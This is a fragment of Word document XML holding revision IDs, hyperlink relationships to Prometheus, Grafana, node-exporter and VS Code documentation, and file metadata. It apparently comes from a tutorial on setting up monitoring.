    <w:rsid w:val="00E96B74"/>
    <w:rsid w:val="00EA1BED"/>
    <w:rsid w:val="00EB1196"/>
    <w:rsid w:val="00EB49E5"/>
    <w:rsid w:val="00EC0D11"/>
    <w:rsid w:val="00EC491D"/>
    <w:rsid w:val="00ED2C3C"/>
    <w:rsid w:val="00ED736C"/>
    <w:rsid w:val="00EE1DE9"/>
    <w:rsid w:val="00EF27E3"/>
    <w:rsid w:val="00F070B6"/>
    <w:rsid w:val="00F14F33"/>
    <w:rsid w:val="00F2095D"/>
    <w:rsid w:val="00F23D0E"/>
    <w:rsid w:val="00F24000"/>
    <w:rsid w:val="00F25551"/>
    <w:rsid w:val="00F307CD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81834"/>
    <w:rsid w:val="00F82115"/>
    <w:rsid w:val="00FB1105"/>
    <w:rsid w:val="00FB287F"/>
    <w:rsid w:val="00FB5454"/>
    <w:rsid w:val="00FB5BD7"/>
    <w:rsid w:val="00FD2A97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b.docker.com/r/prom/node-exporter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rafana.com/grafana/dashboards/1860-node-exporter-full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hyperlink" Target="https://www.youtube.com/watch?v=PCJwJpbln6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metheus.io/docs/prometheus/latest/configuration/configuration/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/login.php" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://grafana.com/grafana/dashboards/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/docs/python/python-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code.visualstudio.com/docs/python/python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mllint.com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theus.io/docs/prometheus/latest/installatio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codebeautify.org/yaml-validator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brew.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FxqD_6XYI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prometheus:9090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python.org/download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2071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96</cp:revision>
  <cp:lastPrinted>2017-12-11T07:13:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-10T15:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07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